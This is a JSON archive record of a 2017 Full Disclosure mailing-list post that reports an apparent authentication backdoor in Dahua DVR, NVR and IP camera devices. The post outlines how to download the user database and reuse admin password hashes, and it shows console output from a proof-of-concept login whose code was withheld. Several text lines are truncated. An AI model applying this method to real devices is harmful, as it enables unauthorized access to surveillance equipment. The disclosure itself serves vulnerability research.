{
	"id": "4c49aa56-b3e5-4c2c-a945-44c4ecc9515e",
	"created_at": "2026-04-06T00:09:46.86013Z",
	"updated_at": "2026-04-10T03:21:39.028543Z",
	"deleted_at": null,
	"sha1_hash": "b3bb51d2d1a12b0c312d23d5c5308cae35d49985",
	"title": "Dahua backdoor Generation 2 and 3",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 56858,
	"plain_text": "Dahua backdoor Generation 2 and 3\r\nBy bashis\r\nArchived: 2026-04-05 22:20:40 UTC\r\nFull Disclosure mailing list archives\r\nFrom: bashis \u003cmcw () noemail eu\u003e\r\nDate: Mon, 6 Mar 2017 07:13:21 +0000\r\n[STX]\r\nI'm speechless, and almost don't know what I should write... I (hardly) can't believe what I have jus\r\nI have just discovered (what I strongly believe is a backdoor) in Dahua DVR/NVR/IPC and possibly all\r\nSince I am convinced this is a backdoor, I have my own policy to NOT notify the vendor before the com\r\n(I simply don't want to listen to their poor excuses, their attempts to keep me silent for informing t\r\nIn short:\r\nYou can delete/add/change names on the admin users, you can change passwords on the admin users - this back\r\ncare about that!\r\nIt uses whatever names and passwords you configure - by simply downloading the full user database a\r\ncredentials!\r\nIt is as simple as:\r\n1. Remotely download the full user database with all credentials and permissions\r\n2. Choose whatever admin user, copy the login names and password hashes\r\n3. Use them as source to remotely login to the Dahua devices\r\nThis is like a damn Hollywood hack, click on one button and you are in...\r\nThe PoC below you will find here: [Dahua asked me to remove the PoC, will be re-posted April 5 2017 – To\r\nfor remediation]\r\nPlease have understanding for the quick hack of the PoC; I'm sure it could be done better.\r\nHave a nice day\r\n/bashis\r\nhttp://seclists.org/fulldisclosure/2017/Mar/7\r\n$ ./dahua-backdoor.py --rhost 192.168.5.2\r\n[*] [Dahua backdoor Generation 2 \u0026 3 (2017 bashis \u003cmcw noemail eu\u003e)]\r\n[i] Remote target IP: 192.168.5.2\r\n[i] Remote target PORT: 80\r\n[\u003e] Checking for backdoor version\r\n[\u003c] 200 OK\r\n[!] Generation 2 found\r\n[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM\r\n[\u003e] Requesting our session ID\r\n[\u003c] 200 OK\r\n[\u003e] Logging in\r\n[\u003c] 200 OK\r\n{ \"id\" : 10000, \"params\" : null, \"result\" : true, \"session\" : 100385023 }\r\n[\u003e] Logging out\r\n[\u003c] 200 OK\r\n[*] All done...\r\n$\r\n$ ./dahua-backdoor.py --rhost 192.168.5.3\r\n[*] [Dahua backdoor Generation 2 \u0026 3 (2017 bashis \u003cmcw noemail eu\u003e)]\r\n[i] Remote target IP: 192.168.5.3\r\n[i] Remote target PORT: 80\r\n[\u003e] Checking for backdoor version\r\n[\u003c] 200 OK\r\n[!] Generation 3 Found\r\n[i] Choosing Admin Login: admin, Auth: 27\r\n[\u003e] Requesting our session ID\r\n[\u003c] 200 OK\r\n[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074\r\n[i] Random value to encrypt with: 1958557123\r\n[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074\r\n[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E\r\n[\u003e] Logging in\r\n[\u003c] 200 OK\r\n{ \"id\" : 10000, \"params\" : null, \"result\" : true, \"session\" : 1175887285 }\r\n[\u003e] Logging out\r\n[\u003c] 200 OK\r\n[*] All done...\r\n$\r\n[ETX]\r\n_______________________________________________\r\nSent through the Full Disclosure mailing list\r\nhttps://nmap.org/mailman/listinfo/fulldisclosure\r\nWeb Archives \u0026 RSS: http://seclists.org/fulldisclosure/\r\nSource: http://seclists.org/fulldisclosure/2017/Mar/7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://seclists.org/fulldisclosure/2017/Mar/7"
	],
	"report_names": [
		"7"
	],
	"threat_actors": [],
	"ts_created_at": 1775434186,
	"ts_updated_at": 1775791299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b3bb51d2d1a12b0c312d23d5c5308cae35d49985.pdf",
		"text": "https://archive.orkl.eu/b3bb51d2d1a12b0c312d23d5c5308cae35d49985.txt",
		"img": "https://archive.orkl.eu/b3bb51d2d1a12b0c312d23d5c5308cae35d49985.jpg"
	}
}